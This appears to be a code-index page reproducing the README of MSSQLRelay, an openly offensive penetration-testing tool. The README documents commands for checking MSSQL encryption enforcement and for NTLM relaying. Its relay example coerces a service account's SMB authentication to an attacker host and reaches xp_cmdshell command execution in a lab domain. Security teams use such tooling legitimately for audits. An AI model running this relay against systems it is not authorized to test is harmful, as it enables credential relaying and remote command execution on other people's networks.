MCPcopy Index your code
hub / github.com/CompassSecurity/mssqlrelay

github.com/CompassSecurity/mssqlrelay @main

Chat with this repo
repository ↗ · DeepWiki ↗ · + Follow
336 symbols 837 edges 24 files 17 documented · 5%
What it actually does AI analysis from the code graph — generated when you open this
loading…
README

MSSQLRelay

Microsoft SQL Relay is an offensive tool for auditing and abusing Microsoft SQL (MSSQL) services.

Installation

Install the dev branch of impacket, then install the mssqlrelay package:

pip3 install git+https://github.com/fortra/impacket.git
pip3 install git+https://github.com/CompassSecurity/mssqlrelay.git

Usage

$ mssqlrelay       
MSSQLRelay v1.0 - by Sylvain Heiniger (@sploutchy) / Compass Security (https://www.compass-security.com)

usage: mssqlrelay [-v] [-h] [-debug] {check,checkall,relay} ...

Microsoft SQL Relaying Tool

positional arguments:
  {check,checkall,relay}
                        Action
    check               Check if server enforces encryption
    checkall            Lists MSSQL servers (from LDAP), check if user has access and encryption settings
    relay               NTLM Relay to MS SQL Endpoints

options:
  -v, --version         Show MSSQLRelay's version number and exit
  -h, --help            Show this help message and exit
  -debug                Turn debug output on

Check

Run checks against a single server (target). Returns information about the server and if encryption is enforced or not.

Options

$ mssqlrelay check -h                                                                                                                
MSSQLRelay v1.0 - by Sylvain Heiniger (@sploutchy) / Compass Security (https://www.compass-security.com)

usage: mssqlrelay check [-h] [-dc-ip ip address] [-target-ip ip address] [-target dns/ip address] [-ns nameserver] [-dns-tcp] [-timeout seconds] [-u username@domain] [-p password] [-hashes [LMHASH:]NTHASH] [-k] [-windows-auth] [-sspi] [-aes hex key] [-no-pass] [-mssql-port port] [-mssql-db db name]

options:
  -h, --help            show this help message and exit

connection options:
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
  -target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot resolve it
  -target dns/ip address
                        DNS Name or IP Address of the target machine. Required for Kerberos or SSPI authentication
  -ns nameserver        Nameserver for DNS resolution
  -dns-tcp              Use TCP instead of UDP for DNS queries
  -timeout seconds      Timeout for connections

authentication options:
  -u username@domain, -username username@domain
                        Username. Format: username@domain
  -p password, -password password
                        Password
  -hashes [LMHASH:]NTHASH
                        NTLM hash, format is [LMHASH:]NTHASH
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
  -windows-auth         whether or not to use Windows Authentication (default True)
  -sspi                 Use Windows Integrated Authentication (SSPI)
  -aes hex key          AES key to use for Kerberos Authentication (128 or 256 bits)
  -no-pass              Don't ask for password (useful for -k and -sspi)

MSSQL options:
  -mssql-port port      MSSQL port to log in to
  -mssql-db db name     MSSQL database instance (default None)

Typical usage

$ mssqlrelay check -target ws1.child.testlab.local -ns 10.0.1.100 -u tmassie@child.testlab.local -p 'Burp!=B33F' -windows-auth
MSSQLRelay v1.0 - by Sylvain Heiniger (@sploutchy) / Compass Security (https://www.compass-security.com)

[+] Trying to resolve 'ws1.child.testlab.local' at '10.0.1.100'
[+] Trying to resolve 'CHILD.TESTLAB.LOCAL' at '10.0.1.100'
[*] ws1.child.testlab.local (10.0.1.103:1433)
[*]   -  Version: Microsoft SQL Server 2019 RTM (15.0.2000)
[*]   -  Encryption: not enforced
[*]   -  Login: successful (as TMASSIE)
[*]   -  DB user: guest
[*]   -  Database: master

CheckAll

Run checks against all MSSQL SPNs in the domain. Target is a domain controller. Returns information about all servers and their configuration.

Options

$ mssqlrelay checkall -h
MSSQLRelay v1.0 - by Sylvain Heiniger (@sploutchy) / Compass Security (https://www.compass-security.com)

usage: mssqlrelay checkall [-h] [-scheme ldap scheme] [-dc-ip ip address] [-target-ip ip address] [-target dns/ip address] [-ns nameserver] [-dns-tcp] [-timeout seconds] [-u username@domain] [-p password] [-hashes [LMHASH:]NTHASH] [-k] [-windows-auth] [-sspi] [-aes hex key] [-no-pass] [-mssql-port port]
                           [-mssql-db db name]

options:
  -h, --help            show this help message and exit

connection options:
  -scheme ldap scheme
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
  -target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot resolve it
  -target dns/ip address
                        DNS Name or IP Address of the target machine. Required for Kerberos or SSPI authentication
  -ns nameserver        Nameserver for DNS resolution
  -dns-tcp              Use TCP instead of UDP for DNS queries
  -timeout seconds      Timeout for connections

authentication options:
  -u username@domain, -username username@domain
                        Username. Format: username@domain
  -p password, -password password
                        Password
  -hashes [LMHASH:]NTHASH
                        NTLM hash, format is [LMHASH:]NTHASH
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
  -windows-auth         whether or not to use Windows Authentication (default True)
  -sspi                 Use Windows Integrated Authentication (SSPI)
  -aes hex key          AES key to use for Kerberos Authentication (128 or 256 bits)
  -no-pass              Don't ask for password (useful for -k and -sspi)

MSSQL options:
  -mssql-port port      MSSQL port to log in to
  -mssql-db db name     MSSQL database instance (default None)

Typical usage

$ mssqlrelay checkall -scheme ldap -target child.testlab.local -ns 10.0.1.100 -u tmassie@child.testlab.local -p 'Burp!=B33F' -windows-auth
MSSQLRelay v1.0 - by Sylvain Heiniger (@sploutchy) / Compass Security (https://www.compass-security.com)

[*] SPNs in domain CHILD.TESTLAB.LOCAL:
[*]   - MSSQLSvc/fs1.child.testlab.local:1433 (running as svc_sql)
[*]   - MSSQLSvc/ws1.child.testlab.local:1433 (running as svc_sql)
[*] Checking found instances ...
[*] fs1.child.testlab.local (10.0.1.101:1433)
[*]   -  Version: Microsoft SQL Server 2019 RTM (15.0.2000)
[*]   -  Encryption: enforced
[*]   -  Login: successful (as TMASSIE)
[*]   -  DB user: guest
[*]   -  Database: master
[*]   -  Privileges: ['xp_dirtree', 'xp_fileexist']
[*] ws1.child.testlab.local (10.0.1.103:1433)
[*]   -  Version: Microsoft SQL Server 2019 RTM (15.0.2000)
[*]   -  Encryption: not enforced
[*]   -  Login: successful (as TMASSIE)
[*]   -  DB user: guest
[*]   -  Database: master

Relay

Connects to victim server (-target) as user (-u) to trigger SMB connection as service account to attacker (attacker) and relay to target server (relaytarget).

Options

$ mssqlrelay checkall -h
MSSQLRelay v1.0 - by Sylvain Heiniger (@sploutchy) / Compass Security (https://www.compass-security.com)

usage: mssqlrelay checkall [-h] [-scheme ldap scheme] [-dc-ip ip address] [-target-ip ip address] [-target dns/ip address] [-ns nameserver] [-dns-tcp] [-timeout seconds] [-u username@domain] [-p password] [-hashes [LMHASH:]NTHASH] [-k] [-windows-auth] [-sspi] [-aes hex key] [-no-pass] [-mssql-port port]
                           [-mssql-db db name]

options:
  -h, --help            show this help message and exit

connection options:
  -scheme ldap scheme
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
  -target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot resolve it
  -target dns/ip address
                        DNS Name or IP Address of the target machine. Required for Kerberos or SSPI authentication
  -ns nameserver        Nameserver for DNS resolution
  -dns-tcp              Use TCP instead of UDP for DNS queries
  -timeout seconds      Timeout for connections

authentication options:
  -u username@domain, -username username@domain
                        Username. Format: username@domain
  -p password, -password password
                        Password
  -hashes [LMHASH:]NTHASH
                        NTLM hash, format is [LMHASH:]NTHASH
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
  -windows-auth         whether or not to use Windows Authentication (default True)
  -sspi                 Use Windows Integrated Authentication (SSPI)
  -aes hex key          AES key to use for Kerberos Authentication (128 or 256 bits)
  -no-pass              Don't ask for password (useful for -k and -sspi)

MSSQL options:
  -mssql-port port      MSSQL port to log in to
  -mssql-db db name     MSSQL database instance (default None)

Typical usage

$ mssqlrelay relay -target fs1.child.testlab.local -u tmassie@child.testlab.local -p 'Burp!=B33F' ws1.child.testlab.local 10.0.1.15 
MSSQLRelay v1.0 - by Sylvain Heiniger (@sploutchy) / Compass Security (https://www.compass-security.com)

[*] Listening on 0.0.0.0:445
[*] Authenticating to victim 10.0.1.101
[*] Triggering connection to \\10.0.1.15\vKCIsdeX
[!] Press help for extra shell commands
SQL (child\svc_sql  dbo@master)> xp_cmdshell whoami
output          
-------------   
child\svc_sql   

NULL        

Contact

Please submit any bugs, issues, questions, or feature requests under "Issues" or send them to me on Twitter @sploutchy.

Credits

  • Alberto Solino and the whole team at impacket
  • Oliver Lyak as I stole the project structure from certipy
  • [Dirk-jan Mollema])(https://twitter.com/_dirkjan) for his great contributions to impacket

Core symbols most depended-on inside this repo

h
called by 34
mssqlrelay/lib/sspi/encryption.py
string_to_key
called by 16
mssqlrelay/lib/sspi/encryption.py
from_bytes
called by 12
mssqlrelay/lib/structs.py
to_string
called by 12
mssqlrelay/lib/sspi/netsecapi.py
to_bytes
called by 11
mssqlrelay/lib/structs.py
decrypt
called by 9
mssqlrelay/lib/sspi/encryption.py
derive
called by 8
mssqlrelay/lib/sspi/encryption.py
_get_enctype_profile
called by 7
mssqlrelay/lib/sspi/encryption.py

Shape

Class 156
Method 116
Function 64

Languages

Python100%

Modules by API surface

mssqlrelay/lib/structs.py105 symbols
mssqlrelay/lib/sspi/netsecapi.py74 symbols
mssqlrelay/lib/sspi/encryption.py72 symbols
mssqlrelay/commands/check.py16 symbols
mssqlrelay/lib/target.py13 symbols
mssqlrelay/lib/ldap.py13 symbols
mssqlrelay/commands/relay.py12 symbols
mssqlrelay/commands/checkall.py8 symbols
mssqlrelay/lib/logger.py7 symbols
mssqlrelay/lib/sspi/kerberos.py3 symbols
mssqlrelay/lib/formatting.py3 symbols
mssqlrelay/lib/kerberos.py2 symbols

For agents

$ claude mcp add mssqlrelay \
  -- python -m otcore.mcp_server <graph>

⬇ download graph artifact